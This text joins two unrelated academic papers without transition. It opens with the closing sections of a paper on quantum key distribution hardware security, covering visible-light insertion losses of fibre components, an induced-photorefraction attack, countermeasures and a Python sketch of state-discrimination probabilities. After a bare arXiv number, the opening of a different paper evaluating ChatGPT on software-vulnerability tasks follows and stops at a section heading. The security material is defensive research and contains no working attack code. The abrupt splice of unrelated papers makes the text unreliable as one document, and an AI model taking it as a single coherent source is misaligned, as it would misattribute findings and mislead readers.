Similar to isolators, in circulators, losses for light propagating from one port to another (forward direction) are low, whereas the light is nearly blocked when the direction of propagation is reversed (backward propagation). In contrast to the isolators, the circulators have several ports (in our case, the circulator has four ports), which opens up additional possibilities for applications in more complicated schemes. For a number of different reasons, in real devices the insertion losses for light propagating in the backward direction will generally be wavelength dependent and may deviate from the value reported by manufacturers. According to the datasheet for the circulator, at λ = 1550 nm, the insertion loss for the backward direction is about 50 dB.

Insertion-loss spectra measured for the cases where light propagates from the third (fourth) port to the first (second) port, bypassing the second (third) port, are presented in Fig. 4(b). It can be seen that in the 400-506 nm range the losses are lower than the reported value at the working wavelength. The minimal value of the insertion losses is 31.1 dB at 419 nm.

Owing to limitations of our experimental setup, we have not detected any noticeable transmission of light for backward propagation between adjacent (neighbouring) ports (for instance, propagation from the second port to the first port). In this case, the results are well below the noise level and bear a close resemblance to the curves measured for the isolator.
IV. SECURITY ISSUES AND COUNTERMEASURES

It is evident that the visible spectrum does not permit the extraction of any additional information regarding signal states. Consequently, the visible spectrum can be considered as an auxiliary component of attacks aimed at altering specific characteristics of optical elements. This includes laser damage attacks, laser seeding, and induced-photorefraction attacks, among others. In the current paper, we focus our attention on the IPA. We analyze various QKD schemes and protocols from open sources and investigate the potential vulnerabilities that may be exploited due to this type of attack. Crucial elements influenced by the IPA include various types of modulators, both phase and intensity modulators. In the following, we consider different scenarios and their implications.

Figure 5. Estimated power that reaches the nearest investigated modulator in a system: (a) is for the scheme from [24], (b) is for the scheme from [30], (c) is for the scheme from [48]; blue (red) solid lines represent the minimal (maximal) power available to an eavesdropper. Frame (d) demonstrates the worst case of all investigated schemes (a)-(c), where the blue solid line represents the evaluated power for [30], red for [24] and green for [48]; the black dashed line represents a conservative mean of the power needed for IPA realization, with yellow, red and green triangles corresponding to estimations from [46], [45] and [27], respectively.

A change of the PM's modulation index may be considered separately, depending on the implemented optical devices. A PM can be a part of the following devices commonly used in the field of QKD:

1. a PM with constant phase shift as a part of an MZI scheme;
2. a PM with oscillating phase shift, utilized in SCW QKD [13, 21, 28, 49];
3. a PM as a part of a variable attenuator;
4. a PM as a part of an intensity modulator.

Despite the latter classification, it is also worth mentioning that the QKD protocol and the utilized quantum states play an essential role in security estimations. Thus, we highlight the following QKD schemes:

1. Protocols utilizing linearly dependent states (such as single-photon BB84 [50] or the single-photon fraction in decoy-state protocols [12, 51, 52]), where this phase-remapping attack should be taken into consideration [53]. A number of papers are dedicated to investigating the problem for these kinds of protocols [27, 45, 46]; also see Fig. 5.

2. Protocols with a linearly independent set of states (coherent states with phase-coding [54–57] or SCW QKD), which have not been considered so far in the light of the IPA auxiliary attack. Further, we draw special attention to these kinds of protocols.
First, we examine protocols utilizing coherent states and phase-coding. Changes in the modulation index lead to alterations in phase, as most QKD systems employ a PM with constant phase shift as a part of an MZI scheme. Thus, phase-remapping by a factor of x is applicable:

{|α_0⟩, |α_0 e^{iπ/N}⟩, |α_0 e^{i2π/N}⟩, ..., |α_0 e^{i(2N−1)π/N}⟩} → {|α⟩, |α e^{ixπ/N}⟩, |α e^{i2xπ/N}⟩, ..., |α e^{i(2N−1)xπ/N}⟩},   (2)

where α_0 is the complex amplitude of the coherent state, α is the complex amplitude after the IPA with |α| ≤ |α_0|, and 2N is the total number of states in the set. After the IPA, the eavesdropper can apply an additional commonly used attack, e.g. the unambiguous state discrimination (USD) attack. The attack is characterized by the USD probability P_U(α, x) for a given set of states. It can be found by estimating the minimal eigenvalue of the Gram matrix G, as in [58, 59]. Unfortunately, after the IPA, the Gram matrix loses essential properties: it can no longer be expressed as G_ij → G_{i−j} and becomes merely symmetric. So an analytical result cannot be obtained for an arbitrary number of states. However, a few analytical observations can be made. We have found that the probability can be expressed as P_U(α, x) = P_U(α, 1) · f(x) with 0 ≤ f(x) ≤ 1, where P_U(α, 1) is the USD probability without remapping. For N = 1, i.e. in the case of just two states as in B92,

P_U(α, x) = 1 − e^{−|α|²(1 − cos(πx))}   (3)

and

f(x) = (1 − e^{−|α|²(1 − cos(πx))}) / (1 − e^{−2|α|²}).   (4)

Expressions for f(x) in the cases N = 2, N = 3 and N = 4 are bulky, so we demonstrate the dependencies f(x) in Fig. 6. Also note that

P_U(α, 1) ≈ 2N (|α|²)^{2N−1} / (2N − 1)!.   (5)

The overlaps of the states after the IPA only increase, so the IPA cannot provide any significant advantage to an eavesdropper.
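To make the Gram-matrix estimate concrete, the following sketch (ours, not from the paper) constructs the Gram matrix of the 2N remapped coherent states from Eq. (2) and uses its minimal eigenvalue as a numerical estimate of P_U(α, x). For the unremapped symmetric set (x = 1) this eigenvalue-based value matches the treatment of [58, 59], and for N = 1 it reproduces Eq. (3); for the merely symmetric post-IPA Gram matrix it should be read as an estimate only:

import numpy as np

def gram_matrix(alpha, x, N):
    # Amplitudes of the 2N remapped states from Eq. (2): alpha * exp(i j x pi / N)
    amps = alpha * np.exp(1j * np.arange(2 * N) * x * np.pi / N)
    # Coherent-state overlap: <a|b> = exp(-|a|^2/2 - |b|^2/2 + conj(a) b)
    a, b = amps[:, None], amps[None, :]
    return np.exp(-np.abs(a) ** 2 / 2 - np.abs(b) ** 2 / 2 + np.conj(a) * b)

def usd_probability(alpha, x, N):
    # Minimal eigenvalue of the (Hermitian) Gram matrix as the P_U estimate
    return float(np.linalg.eigvalsh(gram_matrix(alpha, x, N))[0])

def f_ratio(alpha, x, N):
    # f(x) = P_U(alpha, x) / P_U(alpha, 1), cf. the factorization above
    return usd_probability(alpha, x, N) / usd_probability(alpha, 1.0, N)

# Sanity check against Eq. (3) for N = 1 (two states, as in B92):
alpha, x = 0.8, 0.6
print(usd_probability(alpha, x, 1),
      1 - np.exp(-abs(alpha) ** 2 * (1 - np.cos(np.pi * x))))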
Figure 6. Dependencies f(x), demonstrating the decrease of the unambiguous state discrimination probability in the case of phase-remapping according to expression (2), for: (a) N = 2, (b) N = 3, (c) N = 4.

As for the SCW QKD setup, the IPA here plays the same role as attacking an IM or a PM-based VOA in protocols with coherent states and phase-coding, since the total power of the sidebands is proportional to the modulation index m (more precisely, to 1 − J_0²(m) ≈ m²/2, where the approximation is valid for small values of m and J_0(m) is the Bessel function of the first kind). And the latter can be increased by utilizing the IPA with a recovery, as in [45], where the legitimate parties recalibrate their setups after the IPA.

A countermeasure to this attack can be as follows. Before a connection of the sender's setup to an optical fiber link, the voltage applied to the modulator should be locked by either hardware or software (or both), and only the receiver's setup should calibrate. With the proposed approach to calibration, there is no chance that the power of the prepared states will be higher than it should be, only lower. So again, if the countermeasure is applied, the IPA provides no advantage to an eavesdropper.

However, an alternative straightforward countermeasure can be implemented. The phenomenon of the IPA requires a threshold optical power to emerge. Therefore, additional losses may simply be introduced in order to prevent illumination of the modulator with a power higher than the threshold. To illustrate the idea, we have recreated some optical schemes [24, 30, 48] in the experiment. The recreation was based purely on their description and was performed with the optical elements available to us. We emphasize that the obtained curves in Fig. 5 are mostly for illustrative purposes and may vary depending on a particular choice of optical components. In Fig. 5 the estimated power that reaches the nearest modulator is shown: (a) for the scheme from [24], (b) for the scheme from [30], (c) for the scheme from [48]. We compare the obtained results with a conservative mean of the power needed for IPA realization from [27, 45, 46].

V. DISCUSSION AND CONCLUSION

In this paper, we have studied the spectra of insertion losses of various fiber-optical elements, such as optical attenuators (see Fig. 2) and WDM and isolating components (see Figs. 3 and 4, respectively), in the visible light range with wavelengths from 400 nm to 800 nm. Both the optical elements and the spectral range are important for understanding vulnerabilities of real-world QKD systems to hacking attacks whose efficiency, being wavelength dependent, may noticeably improve in the visible range. Our study is motivated by one such attack, known as the induced-photorefraction attack [27, 45, 46].

The optical scheme behind our experimental technique enables us to perform measurements of the insertion losses with approximately 50 dB dynamic range. It is simple to use and low-cost when compared with analogous schemes discussed, e.g., in Ref. [30]. An important point is that, by using suitably modified methods presented in Ref. [38], the proposed scheme can be improved so as to extend both the wavelength range and the dynamic range of the measurements. As far as certification of QKD systems is concerned, this is a feasible and easy-to-use scheme that can be employed for characterization of the insertion losses of optical elements.
Our experimental data show that OAs implemented into QKD systems as countermeasures against attacks that utilize probing pulses in the visible range require careful consideration. For the VOAs, it turned out that, at certain non-vanishing voltages, the insertion losses in the visible range are lower than the losses at the operational wavelength (see Figs. 2(a)-(b)). The results for the absorption-based FOAs (see Fig. 2(c)) indicate transmittance windows that can be exploited by the IPA. By contrast, the insertion losses of the scattering-based FOAs (see Fig. 2(d)) do not reveal noticeable changes with wavelength. So, this type of OA is preferable as an additional countermeasure against the IPA.

The measured spectra of all the WDM components (see Fig. 3) have transmittance windows where the insertion losses are not high enough to prevent the IPA. It is also shown that the insertion losses for light propagating from the com-port to the ref-port range between 10 dB and 30 dB. Since this direction is used for active monitoring purposes, such losses, combined with the low efficiency of InGaAs photodiodes in the visible range, will make the monitoring ineffective. One way around this problem is to use Si-based photodiodes as the watchdog detectors against optical probing pulses in the 400-800 nm range.

From the insertion-loss spectrum shown in Fig. 4(a), the dual-stage isolator delivers at least 44 dB of insertion losses. Presumably, such losses can be attributed to absorption by the magneto-optical material used in the isolator. Similar insertion losses were measured in the circulator for the case of backward propagation of light between adjacent ports.

The insertion losses for the light passing from the third port to the first port, plotted against wavelength in Fig. 4(b), show that the well-known broadband filtering scheme [60] based on a Bragg grating connected to the second port of the circulator becomes ineffective in the 400-506 nm range. Thus, it cannot be employed as a reliable tool to counter the IPA.

We summarize with the remark that the scattering-based FOA, characterized by nearly wavelength-independent losses and utilized in combination with a couple of the isolating components, will deliver at least 100 dB of insertion losses, which is enough to counter successful realization of the IPA.

Security issues for various types of protocols, with appropriate countermeasures where necessary, were considered as well. We did not cover protocols with a set of linearly dependent states, since there are a number of papers dedicated to investigating that problem. However, we have considered protocols with a set of linearly independent states, such as coherent states with phase-coding or the SCW QKD protocol. Unlike the first type of protocols, the second ones are not vulnerable to the IPA followed by a phase-remapping attack. For instance, as shown in Fig. 6, phase remapping in this case only decreases the chances of unambiguous state discrimination, and it also does so for a general measurement-outcome probability due to the increase of the overlap between states. However, the IPA with recovery can be performed against protocols that utilize an AM or IM based on a PM to control the power of the prepared states, or where the PM itself defines it, such as in SCW QKD. Here we propose either locking the sender's voltage applied to the modulator, so that only the receiver may calibrate the parameters, or introducing additional insertion losses. Estimation of the amount of additional insertion losses can be done by analyzing the power that reaches the nearest investigated modulator in a system, utilizing the technique described above, as shown in Fig. 5.

ACKNOWLEDGMENTS

The study is partially funded by the Ministry of Education and Science of the Russian Federation (Passport No. 2019-0903).

Appendix A: Beamsplitters

In order to present the calculated insertion losses for the investigated schemes in Fig. 5, we have additionally measured several beamsplitters. These beamsplitters are specified for the 1550 nm wavelength: a 50/50 beamsplitter with three connection ports, Fig. 7(a); a 50/50 beamsplitter with four connection ports, Fig. 7(b); one polarization beamsplitter with three ports, Fig. 7(c); and one 99/1 beamsplitter with four ports, Fig. 7(d).

To simplify the perception of the figures, only the backward propagations are presented as the insertion losses, since there is only a minor difference between the forward and the backward propagation. Here we define a forward connection as the propagation of scanning light from a port with a lower number to a port with a higher number, and a backward connection as its opposite; for instance, see the box in Fig. 7.
For each beamsplitter, the splitting ratios differ from the one at the working wavelength, with an exception for the 99/1 beamsplitter. This may be useful for an eavesdropper in the case when legitimate users have not measured the insertion losses of beamsplitters within the considered range and have eventually chosen lower values. On the other hand, it may also be used as an additional countermeasure to attenuate injected light.

Figure 7. Insertion losses measured in the 400-800 nm range for: (a) 50/50 three-port beamsplitter, (b) 50/50 four-port beamsplitter, (c) three-port polarization beamsplitter, (d) 99/1 four-port beamsplitter; (e) and (f) illustrate the port numeration of the beamsplitters.

[1] V. Scarani, H. Bechmann-Pasquinucci, N. J. Cerf, M. Dušek, N. Lütkenhaus, and M. Peev, The security of practical quantum key distribution, Rev. Mod. Phys. 81, 1301 (2009).
[2] N. Gisin, G. Ribordy, W. Tittel, and H. Zbinden, Quantum cryptography, Rev. Mod. Phys. 74, 145 (2002).
[3] R. Renner, N. Gisin, and B. Kraus, Information-theoretic security proof for quantum-key-distribution protocols, Physical Review A 72, 012332 (2005).
[4] C. Portmann and R. Renner, Cryptographic security of quantum key distribution, arXiv preprint arXiv:1409.3525 (2014).
[5] P. W. Shor and J. Preskill, Simple proof of security of the BB84 quantum key distribution protocol, Physical Review Letters 85, 441 (2000).
[6] M. Christandl, R. Renner, and A. Ekert, A generic security proof for quantum key distribution, arXiv preprint quant-ph/0402131 (2004).
[7] H. Inamori, N. Lütkenhaus, and D. Mayers, Unconditional security of practical quantum key distribution, The European Physical Journal D 41, 599 (2007).
[8] M. Ben-Or, M. Horodecki, D. W. Leung, D. Mayers, and J. Oppenheim, The universal composable security of quantum key distribution, in Theory of Cryptography: Second Theory of Cryptography Conference, TCC 2005, Cambridge, MA, USA, February 10-12, 2005, Proceedings (Springer, 2005) pp. 386–406.
[9] A. Leverrier, R. García-Patrón, R. Renner, and N. J. Cerf, Security of continuous-variable quantum key distribution against general attacks, Physical Review Letters 110, 030502 (2013).
[10] M. Curty, T. Moroder, X. Ma, H.-K. Lo, and N. Lütkenhaus, Upper bounds for the secure key rate of the decoy-state quantum key distribution, Physical Review A 79, 032335 (2009).
[11] D. Gottesman, H.-K. Lo, N. Lütkenhaus, and J. Preskill, Security of quantum key distribution with imperfect devices, in International Symposium on Information Theory, 2004. ISIT 2004. Proceedings (IEEE, 2004) p. 136.
[12] H.-K. Lo, X. Ma, and K. Chen, Decoy state quantum key distribution, Physical Review Letters 94, 230504 (2005).
[13] A. Gaidash, G. Miroshnichenko, and A. Kozubov, Subcarrier wave quantum key distribution with leaky and flawed devices, JOSA B 39, 577 (2022).
[14] C.-H. F. Fung, K. Tamaki, B. Qi, H.-K. Lo, and X. Ma, Security proof of quantum key distribution with detection efficiency mismatch, arXiv preprint arXiv:0802.3788 (2008).
[15] Y. Zhang, P. J. Coles, A. Winick, J. Lin, and N. Lütkenhaus, Security proof of practical quantum key distribution with detection-efficiency mismatch, Physical Review Research 3, 013076 (2021).
[16] M. Bochkov and A. Trushechkin, Security of quantum key distribution with detection-efficiency mismatch in the single-photon case: Tight bounds, Physical Review A 99, 032308 (2019).
[17] U. Vazirani and T. Vidick, Fully device independent quantum key distribution, Communications of the ACM 62, 133 (2019).
[18] V. Zapatero, T. van Leent, R. Arnon-Friedman, W.-Z. Liu, Q. Zhang, H. Weinfurter, and M. Curty, Advances in device-independent quantum key distribution, npj Quantum Information 9, 10 (2023).
[19] R. Arnon-Friedman, F. Dupuis, O. Fawzi, R. Renner, and T. Vidick, Practical device-independent quantum cryptography via entropy accumulation, Nature Communications 9, 459 (2018).
[20] R. Arnon-Friedman, R. Renner, and T. Vidick, Simple and tight device-independent security proofs, SIAM Journal on Computing 48, 181 (2019).
[21] V. Chistiakov, A. Kozubov, A. Gaidash, A. Gleim, and G. Miroshnichenko, Feasibility of twin-field quantum key distribution based on multi-mode coherent phase-coded states, Optics Express 27, 36551 (2019).
[22] H.-K. Lo, M. Curty, and B. Qi, Measurement-device-independent quantum key distribution, Physical Review Letters 108, 130503 (2012).
[23] S. L. Braunstein and S. Pirandola, Side-channel-free quantum key distribution, Physical Review Letters 108, 130502 (2012).
[24] M. Lucamarini, I. Choi, M. B. Ward, J. F. Dynes, Z. Yuan, and A. J. Shields, Practical security bounds against the Trojan-horse attack in quantum key distribution, Physical Review X 5, 031030 (2015).
[25] S. Pirandola, R. Laurenza, C. Ottaviani, and L. Banchi, Fundamental limits of repeaterless quantum communications, Nature Communications 8, 1 (2017).
[26] A. Acín, N. Brunner, N. Gisin, S. Massar, S. Pironio, and V. Scarani, Device-independent security of quantum cryptography against collective attacks, Phys. Rev. Lett. 98, 230501 (2007).
[27] F.-Y. Lu, P. Ye, Z.-H. Wang, S. Wang, Z.-Q. Yin, R. Wang, X.-J. Huang, W. Chen, D.-Y. He, G.-J. Fan-Yuan, et al., Hacking measurement-device-independent quantum key distribution, Optica 10, 520 (2023).
[28] S. Sajeed, P. Chaiwongkhot, A. Huang, H. Qin, V. Egorov, A. Kozubov, A. Gaidash, V. Chistiakov, A. Vasiliev, A. Gleim, et al., An approach for security evaluation and certification of a complete quantum communication system, Scientific Reports 11, 5110 (2021).
[29] S. Sun and A. Huang, A review of security evaluation of practical quantum key distribution system, Entropy 24, 260 (2022).
[30] V. Makarov, A. Abrikosov, P. Chaiwongkhot, A. K. Fedorov, A. Huang, E. Kiktenko, M. Petrov, A. Ponosova, D. Ruzhitskaya, A. Tayduganov, et al., Preparing a commercial quantum key distribution system for certification against implementation loopholes, arXiv preprint arXiv:2310.20107 (2023).
[31] A. Vakhitov, V. Makarov, and D. R. Hjelme, Large pulse attack as a method of conventional optical eavesdropping in quantum cryptography, Journal of Modern Optics 48, 2023 (2001).
[32] N. Gisin, S. Fasel, B. Kraus, H. Zbinden, and G. Ribordy, Trojan-horse attacks on quantum-key-distribution systems, Physical Review A 73, 022320 (2006).
[33] V. Makarov, Controlling passively quenched single photon detectors by bright light, New Journal of Physics 11, 065003 (2009).
[34] V. Chistiakov, A. Huang, V. Egorov, and V. Makarov, Controlling single-photon detector ID210 with bright light, Optics Express 27, 32253 (2019).
[35] B. Gao, Z. Wu, W. Shi, Y. Liu, D. Wang, C. Yu, A. Huang, and J. Wu, Ability of strong-pulse illumination to hack self-differencing avalanche photodiode detectors in a high-speed quantum-key-distribution system, Physical Review A 106, 033713 (2022).
[36] A. Borisova, B. Garmaev, I. Bobrov, S. Negodyaev, and I. Sinil'shchikov, Risk analysis of countermeasures against the Trojan-horse attacks on quantum key distribution systems in 1260–1650 nm spectral range, Optics and Spectroscopy 128, 1892 (2020).
[37] B. Nasedkin, F. Kiselev, I. Filipov, D. Tolochko, A. Ismagilov, V. Chistiakov, A. Gaidash, A. Tcypkin, A. Kozubov, and V. Egorov, Loopholes in the 1500–2100-nm range for quantum-key-distribution components: Prospects for Trojan-horse attacks, Physical Review Applied 20, 014038 (2023).
[38] I. S. Sushchev, D. M. Guzairova, A. N. Klimov, D. A. Dvoretskiy, S. A. Bogdanov, K. D. Bondar, and A. P. Naumenko, Practical security analysis against the Trojan-horse attacks on fiber-based phase-coding QKD system in the wide spectral range, in Emerging Imaging and Sensing Technologies for Security and Defence VI, Vol. 11868 (SPIE, 2021) pp. 57–63.
[39] N. Jain, B. Stiller, I. Khan, V. Makarov, C. Marquardt, and G. Leuchs, Risk analysis of Trojan-horse attacks on practical quantum key distribution systems, IEEE Journal of Selected Topics in Quantum Electronics 21, 168 (2014).
[40] B. Nasedkin, I. Filipov, A. Ismagilov, V. Chistiakov, F. Kiselev, A. Tsypkin, and V. Egorov, Analyzing transmission spectra of fiber-optic elements in the near IR range to improve the security of quantum key distribution systems, Bulletin of the Russian Academy of Sciences: Physics 86, 1164 (2022).
[41] S. Alferov, K. Bugai, and I. Pargachev, Study of the vulnerability of neutral optical filters used in quantum key distribution systems against laser damage attack, JETP Letters 116, 123 (2022).
[42] A. Huang, R. Li, V. Egorov, S. Tchouragoulov, K. Kumar, and V. Makarov, Laser-damage attack against optical attenuators in quantum key distribution, Physical Review Applied 13, 034017 (2020).
[43] A. Ponosova, D. Ruzhitskaya, P. Chaiwongkhot, V. Egorov, V. Makarov, and A. Huang, Protecting fiber-optic quantum key distribution sources against light-injection attacks, PRX Quantum 3, 040307 (2022).
[44] P. Chaiwongkhot, J. Zhong, A. Huang, H. Qin, S.-C. Shi, and V. Makarov, Faking photon number on a transition-edge sensor, EPJ Quantum Technology 9, 23 (2022).
[45] L. Han, Y. Li, H. Tan, W. Zhang, W. Cai, J. Yin, J. Ren, F. Xu, S. Liao, and C. Peng, Effect of light injection on the security of practical quantum key distribution, Physical Review Applied 20, 044013 (2023).
[46] P. Ye, W. Chen, G.-W. Zhang, F.-Y. Lu, F.-X. Wang, G.-Z. Huang, S. Wang, D.-Y. He, Z.-Q. Yin, G.-C. Guo, et al., Induced-photorefraction attack against quantum key distribution, Physical Review Applied 19, 054052 (2023).
[47] P.-F. Gu and Z.-R. Zheng, Design of non-polarizing thin film edge filters, Journal of Zhejiang University-SCIENCE A 7, 1037 (2006).
[48] A. A. Hajomer, I. Derkach, N. Jain, H.-M. Chin, U. L. Andersen, and T. Gehring, Long-distance continuous-variable quantum key distribution over 100-km fiber with local local oscillator, Science Advances 10, eadi9474 (2024).
[49] G. Miroshnichenko, A. Kozubov, A. Gaidash, A. Gleim, and D. Horoshko, Security of subcarrier wave quantum key distribution against the collective beam-splitting attack, Optics Express 26, 11292 (2018).
[50] C. H. Bennett and G. Brassard, Quantum cryptography: Public key distribution and coin tossing, Theoretical Computer Science 560, 7 (2014).
[51] X. Ma, B. Qi, Y. Zhao, and H.-K. Lo, Practical decoy state for quantum key distribution, Physical Review A 72, 012326 (2005).
[52] X.-B. Wang, Beating the photon-number-splitting attack in practical quantum cryptography, Physical Review Letters 94, 230503 (2005).
[53] C.-H. F. Fung, B. Qi, K. Tamaki, and H.-K. Lo, Phase-remapping attack in practical quantum-key-distribution systems, Physical Review A 75, 032314 (2007).
[54] C. H. Bennett, Quantum cryptography using any two nonorthogonal states, Physical Review Letters 68, 3121 (1992).
[55] H.-K. Lo and J. Preskill, Security of quantum key distribution using weak coherent states with nonrandom phases, arXiv preprint quant-ph/0610203 (2006).
[56] C. H. Bennett, F. Bessette, G. Brassard, L. Salvail, and J. Smolin, Experimental quantum cryptography, Journal of Cryptology 5, 3 (1992).
[57] C. Gobby, Z. L. Yuan, and A. J. Shields, Quantum key distribution over 122 km of standard telecom fiber, Applied Physics Letters 84, 3762 (2004).
[58] A. Kozubov, A. Gaidash, and G. Miroshnichenko, Quantum control attack: Towards joint estimation of protocol and hardware loopholes, Physical Review A 104, 022603 (2021).
[59] A. Gaidash, A. Kozubov, and G. Miroshnichenko, Methods of decreasing the unambiguous state discrimination probability for subcarrier wave quantum key distribution systems, JOSA B 36, B16 (2019).
[60] I. Riant, Fiber Bragg gratings for optical telecommunications, Comptes Rendus Physique 4, 41 (2003).
2404.03994

Pros and Cons! Evaluating ChatGPT on Software Vulnerability

XIN YIN, Zhejiang University, China

This paper proposes a pipeline for quantitatively evaluating interactive LLMs such as ChatGPT using a publicly available dataset. We carry out an extensive technical evaluation of ChatGPT using Big-Vul, covering five different common software vulnerability tasks. We evaluate the multitask and multilingual aspects of ChatGPT based on this dataset. We found that the existing state-of-the-art methods are generally superior to ChatGPT in software vulnerability detection. Although ChatGPT improves accuracy when provided with context information, it still has limitations in accurately predicting severity ratings for certain CWE types. In addition, ChatGPT demonstrates some ability in locating vulnerabilities for certain CWE types, but its performance varies among different CWE types. ChatGPT exhibits limited vulnerability repair capabilities both when provided with context information and when not. Finally, ChatGPT shows uneven performance in generating CVE descriptions for various CWE types, with limited accuracy in detailed information. Overall, though ChatGPT performs well in some aspects, it still needs improvement in understanding the subtle differences in code vulnerabilities and in the ability to describe vulnerabilities in order to fully realize its potential. Our evaluation framework provides valuable insights for further enhancing ChatGPT's software vulnerability handling capabilities.

1 INTRODUCTION

Software Vulnerabilities (SVs) can expose software systems to risk situations and eventually cause huge economic losses or even threaten people's lives. Therefore, addressing software vulnerabilities is an important task for software quality assurance (SQA). Generally, there are many important software quality activities for software vulnerabilities, such as SV detection, SV assessment, SV location, SV repair, and SV description generation. The relationship among these SQA activities is illustrated in Fig. 1.

Fig. 1. The relationship among software vulnerability activities: source code flows through vulnerability detection (RQ-1), vulnerability assessment (RQ-2), vulnerability location (RQ-3), vulnerability repair (RQ-4), and vulnerability description (RQ-5).

Meanwhile, ChatGPT has become a well-known AI model for general public users, including users who are not familiar with LLMs or computer science technology. It is developed by OpenAI and technically built on the GPT-3.5 architecture [4]. The most important reason why ChatGPT has become so popular is that ChatGPT has the ability to cover innumerable use cases for both academic and non-academic users online. Besides, some discussions are conducted about whether ChatGPT is approaching Artificial General Intelligence (AGI), since it has the ability to address many types of tasks without specific fine-tuning [20, 21]. There are still some debates concerning its failures in a few simple tasks [12, 19, 48].

In this paper, we focus on evaluating ChatGPT's performance in various software vulnerability (SV)-related tasks in a zero-shot setting to obtain a basic, comprehensive, and better understanding of its multi-task ability, and we aim to answer the following research questions.

Author's address: Xin Yin, Zhejiang University, Hangzhou, Zhejiang, China, xyin@zju.edu.cn.

• RQ-1: How does ChatGPT perform on vulnerability detection? Software Vulnerabilities (SVs) can expose software systems to risk situations and consequently to software function failure. Therefore, detecting these SVs is an important task for software quality assurance. We want to explore the ability of ChatGPT on vulnerability detection as well as the performance difference compared with state-of-the-art approaches.
• RQ-2: How does ChatGPT perform on vulnerability assessment? In practice, due to the limitation of SQA resources [28], it is impossible to treat all detected SVs equally and fix all SVs simultaneously. Thus, it is necessary to prioritize these detected software vulnerabilities for better treatment. An effective solution to prioritize those SVs which pose imminent and serious threats to the systems of interest is to use one of the most widely known SV assessment frameworks, CVSS (Common Vulnerability Scoring System) [29], which characterizes SVs by considering three metric groups: Base, Temporal and Environmental. The metrics in these groups can further be used as the criterion for selecting serious SVs to fix early. Therefore, we want to explore the ability of ChatGPT in assessing vulnerabilities.

• RQ-3: How does ChatGPT perform on vulnerability location? Identifying the precise location of vulnerabilities in software systems is of critical importance for mitigating risks and improving software quality. The vulnerability location task involves pinpointing these weaknesses accurately and helps to narrow the scope for developers to fix problems. Therefore, we aim to investigate ChatGPT's capability in effectively identifying the precise location of vulnerabilities in software systems.

• RQ-4: How does ChatGPT perform on vulnerability repair? Addressing vulnerabilities in software systems is crucial for risk mitigation and software quality enhancement. The vulnerability repair task requires effective identification and remediation of these flaws in source code and consequently helps to improve development efficiency. We want to examine ChatGPT's proficiency in efficiently repairing vulnerabilities in software systems.
• RQ-5: How does ChatGPT perform on vulnerability description generation? Understanding the intricacies of vulnerabilities in software systems plays a pivotal role in alleviating risks and bolstering software quality. The vulnerability description task focuses on conveying a detailed explanation of these identified issues in the source code and helps participants to better understand the risk as well as its impacts. Our aim is to assess ChatGPT's capacity to effectively generate descriptions of vulnerabilities within software systems.

Besides, to extensively and comprehensively analyze the model's ability, we use a large-scale dataset containing real-world project vulnerabilities (named Big-Vul). Then, we carefully design experiments to discover the findings by answering the five RQs. Eventually, the main contributions of our work are summarized as follows, and the takeaway findings are shown in Table 1.

• We extensively evaluate the performance of ChatGPT on different software vulnerability tasks and conduct an extensive comparison between ChatGPT and learning-based approaches on software vulnerability.
• We design five RQs to comprehensively understand ChatGPT from different dimensions, and support our conclusions with effective results and examples.
• We release our reproduction package for further study [2].

Table 1. Insights and Takeaways: Evaluating ChatGPT on Software Vulnerability

Vulnerability Detection:
1. The existing state-of-the-art approaches perform better than ChatGPT.
2. ChatGPT excels at null pointer and access control vulnerabilities but struggles with others.
3. ChatGPT is easily swayed to change vulnerability classifications, indicating low confidence.
Vulnerability Assessment:
4. ChatGPT has limited capacity for assessment of vulnerability, but can be improved with more context.
5. ChatGPT's inconsistent vulnerability severity prediction across CWEs highlights needed enhancements.
6. ChatGPT's vulnerability severity prediction improves with key info, but varies by CWE type.
Vulnerability Localization:
7. ChatGPT exhibits a certain capability in vulnerability location, and its performance varies among different CWE types.
Vulnerability Repair:
8. ChatGPT has limited ability in repairing vulnerabilities, no matter whether provided with context information or not.
9. ChatGPT's performance in repairing can be attributed to its ability to recognize and understand specific vulnerability patterns.
Vulnerability Description:
10. ChatGPT has uneven CVE description generation across CWEs, with limited detail accuracy.
11. ChatGPT has uneven vulnerability description ability due to training data, complexity, and language specificity.

2 BACKGROUND AND RELATED WORK

2.1 Large Language Model

Since the advancements in Natural Language Processing, Large Language Models (LLMs) [6] have seen widespread adoption due to their capacity to be effectively trained with billions of parameters and training samples, resulting in significant performance enhancements. LLMs can readily be applied to downstream tasks through either fine-tuning [46] or prompting [37]. Their versatility stems from being trained to possess a broad understanding, enabling them to capture diverse knowledge across various domains. Fine-tuning involves updating the model parameters specifically for a given downstream task through iterative training on a specific dataset. In contrast, prompting allows for direct utilization by providing natural language descriptions or a few examples of the downstream task. Compared to prompting, fine-tuning is resource-intensive, as it necessitates additional model training and is applicable in limited scenarios, particularly when adequate training datasets are unavailable.
LLMs are usually built on the transformer architecture [53] and can be classified into three types of architectures: encoder-only, encoder-decoder, and decoder-only. Encoder-only (e.g., CodeBERT [16], GraphCodeBERT [23], and UniXcoder [22]) and encoder-decoder (e.g., PLBART [3] and CodeT5 [54]) models are trained using the Masked Language Modeling (MLM) or Masked Span Prediction (MSP) objective, respectively, where a small portion (e.g., 15%) of the tokens are replaced with either masked tokens or masked span tokens, and the LLMs are trained to recover the masked tokens. These models are trained as general ones on code-related data and then fine-tuned for the downstream tasks to achieve superior performance. Decoder-only models also attract a portion of people's attention; they are trained using Causal Language Modeling objectives to predict the probability of the next token given all previous tokens. GPT [46] and its variants are the most representative models, which bring large language models into practical usage.

Recently, the ChatGPT model has attracted the widest attention from the world. It is the successor of the large language model InstructGPT [44], with a dialog interface, that is fine-tuned using the Reinforcement Learning with Human Feedback (RLHF) approach [13, 44, 61]. RLHF initially fine-tunes the base model using a small dataset of prompts as input and the desired output, typically human-written, to refine its performance. Subsequently, a reward model is trained on a larger set of prompts by sampling outputs generated by the fine-tuned model. These outputs are then reordered by human labelers to provide feedback for training the reward model. Reinforcement learning [47] is then used to calculate rewards for each generated output based on the reward model, updating the LLM parameters accordingly. With fine-tuning and alignment with human preferences, LLMs better understand input prompts and instructions, enhancing performance across various tasks [4, 44].
2.2 Software Vulnerability

